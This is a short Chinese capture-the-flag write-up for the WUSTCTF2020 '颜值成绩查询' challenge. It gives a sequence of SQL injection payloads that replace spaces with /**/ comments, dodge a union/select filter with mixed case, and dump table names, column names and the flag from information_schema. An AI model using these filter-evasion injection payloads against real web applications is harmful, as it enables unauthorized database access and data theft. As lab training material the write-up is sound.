[WUSTCTF2020]颜值成绩查询1
考点:
sql
bool盲注
bypass
先打开页面看到有个输入框,输入个1发现回显
如果是1'的话就不行了,通过测试发现是过滤了空格,需要还是需要使用注释符/**/来绕过,爆列数
payload:1/**/order/**/by/**/3--+
发现只有三列,在输入payload:1/**/union/**/select/**/1,2,3--+时发现union和select被过滤了,可以使用大小写来混淆绕过,所以payload应该是 -1/**/uNion/**/sElect/**/1,2,3--+
接着来爆表名
payload:-1/**/uNion/**/sElect/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()--+
然后来爆列名
payload:-1/**/uNion/**/sElect/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'--+
获取flag值payload:-1/**/uNion/**/sElect/**/1,2,group_concat(flag,value)/**/from/**/flag--+
还有其他方法,布尔盲注upfine的博客 (cnblogs.com)
参考文章
[WUSTCTF2020]颜值成绩查询 - 跳河离去的鱼 - 博客园 (cnblogs.com)
upfine的博客 (cnblogs.com)